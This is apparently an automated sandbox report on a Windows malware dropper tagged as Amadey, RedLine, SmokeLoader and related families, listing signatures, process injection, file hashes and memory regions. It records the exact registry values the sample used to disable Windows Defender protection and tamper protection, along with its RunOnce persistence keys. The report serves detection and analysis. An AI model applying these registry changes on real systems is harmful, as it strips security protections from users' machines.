Malware Analysis Report

2025-01-23 09:10

Sample ID 231010-zcep8ahf6z
Target file.exe
SHA256 93672fe5c7a31c3ec7781d80ddd3104032dda555446444be8e1fc547bdaf5fd9
Tags
evasion persistence trojan amadey dcrat glupteba healer redline smokeloader 6012068394_99 lutyr magia up3 backdoor discovery dropper infostealer loader rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

93672fe5c7a31c3ec7781d80ddd3104032dda555446444be8e1fc547bdaf5fd9

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

evasion persistence trojan amadey dcrat glupteba healer redline smokeloader 6012068394_99 lutyr magia up3 backdoor discovery dropper infostealer loader rat spyware stealer

Healer

Glupteba payload

Modifies Windows Defender Real-time Protection settings

Detects Healer an antivirus disabler dropper

SmokeLoader

RedLine

RedLine payload

DcRat

Glupteba

Amadey

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Enumerates physical storage devices

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:34

Reported

2023-10-10 20:36

Platform

win7-20230831-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2120 set thread context of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 268

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

MD5 a435fbc1e4e361f61a211d6cac3a4260
SHA1 3cb3d775bb552f7756705eeffa4f980bb65d79b3
SHA256 d58166b3ac6911cee9174430f5095c0c784aa7758fedbbaa6397c478bfe0779c
SHA512 4961076820bd6733dbf7df74a2e9d4983d6a8b34a6e251cc0cbc3d0f8a67b79d8fa64c0ea206ac5b81ab3e6f270a5cc84d059bb27ce730f691cf2ba901ae5b76

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

MD5 a435fbc1e4e361f61a211d6cac3a4260
SHA1 3cb3d775bb552f7756705eeffa4f980bb65d79b3
SHA256 d58166b3ac6911cee9174430f5095c0c784aa7758fedbbaa6397c478bfe0779c
SHA512 4961076820bd6733dbf7df74a2e9d4983d6a8b34a6e251cc0cbc3d0f8a67b79d8fa64c0ea206ac5b81ab3e6f270a5cc84d059bb27ce730f691cf2ba901ae5b76

\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

MD5 a435fbc1e4e361f61a211d6cac3a4260
SHA1 3cb3d775bb552f7756705eeffa4f980bb65d79b3
SHA256 d58166b3ac6911cee9174430f5095c0c784aa7758fedbbaa6397c478bfe0779c
SHA512 4961076820bd6733dbf7df74a2e9d4983d6a8b34a6e251cc0cbc3d0f8a67b79d8fa64c0ea206ac5b81ab3e6f270a5cc84d059bb27ce730f691cf2ba901ae5b76

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

MD5 a435fbc1e4e361f61a211d6cac3a4260
SHA1 3cb3d775bb552f7756705eeffa4f980bb65d79b3
SHA256 d58166b3ac6911cee9174430f5095c0c784aa7758fedbbaa6397c478bfe0779c
SHA512 4961076820bd6733dbf7df74a2e9d4983d6a8b34a6e251cc0cbc3d0f8a67b79d8fa64c0ea206ac5b81ab3e6f270a5cc84d059bb27ce730f691cf2ba901ae5b76

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

MD5 2b96a89e9ca635edafdb9682afa0d7a2
SHA1 669c1d1ba10291b7bff1378ae803acaf9e0d12d2
SHA256 127468c28226ccddc49412cff9429be898e88226b9f0431a1fa3993ae05ab9b2
SHA512 e990b19724f209a531d9c83795726b1f37dfb6c64eee2dfb080754b9c9190395542c7653cf867a1b55c2e9d8632f3258bd207fd2ff8687317dfe226a13bde36f

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

MD5 2b96a89e9ca635edafdb9682afa0d7a2
SHA1 669c1d1ba10291b7bff1378ae803acaf9e0d12d2
SHA256 127468c28226ccddc49412cff9429be898e88226b9f0431a1fa3993ae05ab9b2
SHA512 e990b19724f209a531d9c83795726b1f37dfb6c64eee2dfb080754b9c9190395542c7653cf867a1b55c2e9d8632f3258bd207fd2ff8687317dfe226a13bde36f

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

MD5 2b96a89e9ca635edafdb9682afa0d7a2
SHA1 669c1d1ba10291b7bff1378ae803acaf9e0d12d2
SHA256 127468c28226ccddc49412cff9429be898e88226b9f0431a1fa3993ae05ab9b2
SHA512 e990b19724f209a531d9c83795726b1f37dfb6c64eee2dfb080754b9c9190395542c7653cf867a1b55c2e9d8632f3258bd207fd2ff8687317dfe226a13bde36f

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

MD5 2b96a89e9ca635edafdb9682afa0d7a2
SHA1 669c1d1ba10291b7bff1378ae803acaf9e0d12d2
SHA256 127468c28226ccddc49412cff9429be898e88226b9f0431a1fa3993ae05ab9b2
SHA512 e990b19724f209a531d9c83795726b1f37dfb6c64eee2dfb080754b9c9190395542c7653cf867a1b55c2e9d8632f3258bd207fd2ff8687317dfe226a13bde36f

\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

MD5 aae355668362de272191fdfd215753b2
SHA1 4de07034358734227c371008fd7ffa3062c4041e
SHA256 6396fef1ecfd47dd6479ae35389809b6d9a94c3aedf32b2b863cf25b999d3d1f
SHA512 5b5763933e76b34f61ab351d0f12c0428b80ed9f7b289bc54548e0581dc5e1b3dcf9540d3fbbe94fd78bf3ef0b3b3b415dab15a1edeed24aca870dc659496066

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

MD5 aae355668362de272191fdfd215753b2
SHA1 4de07034358734227c371008fd7ffa3062c4041e
SHA256 6396fef1ecfd47dd6479ae35389809b6d9a94c3aedf32b2b863cf25b999d3d1f
SHA512 5b5763933e76b34f61ab351d0f12c0428b80ed9f7b289bc54548e0581dc5e1b3dcf9540d3fbbe94fd78bf3ef0b3b3b415dab15a1edeed24aca870dc659496066

\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

MD5 aae355668362de272191fdfd215753b2
SHA1 4de07034358734227c371008fd7ffa3062c4041e
SHA256 6396fef1ecfd47dd6479ae35389809b6d9a94c3aedf32b2b863cf25b999d3d1f
SHA512 5b5763933e76b34f61ab351d0f12c0428b80ed9f7b289bc54548e0581dc5e1b3dcf9540d3fbbe94fd78bf3ef0b3b3b415dab15a1edeed24aca870dc659496066

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

MD5 aae355668362de272191fdfd215753b2
SHA1 4de07034358734227c371008fd7ffa3062c4041e
SHA256 6396fef1ecfd47dd6479ae35389809b6d9a94c3aedf32b2b863cf25b999d3d1f
SHA512 5b5763933e76b34f61ab351d0f12c0428b80ed9f7b289bc54548e0581dc5e1b3dcf9540d3fbbe94fd78bf3ef0b3b3b415dab15a1edeed24aca870dc659496066

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

memory/2784-40-0x0000000000390000-0x00000000003AE000-memory.dmp

memory/2784-41-0x0000000000530000-0x000000000054C000-memory.dmp

memory/2784-42-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-43-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-45-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-49-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-55-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-65-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-69-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-67-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-63-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-61-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-59-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-57-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-53-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-51-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2784-47-0x0000000000530000-0x0000000000546000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
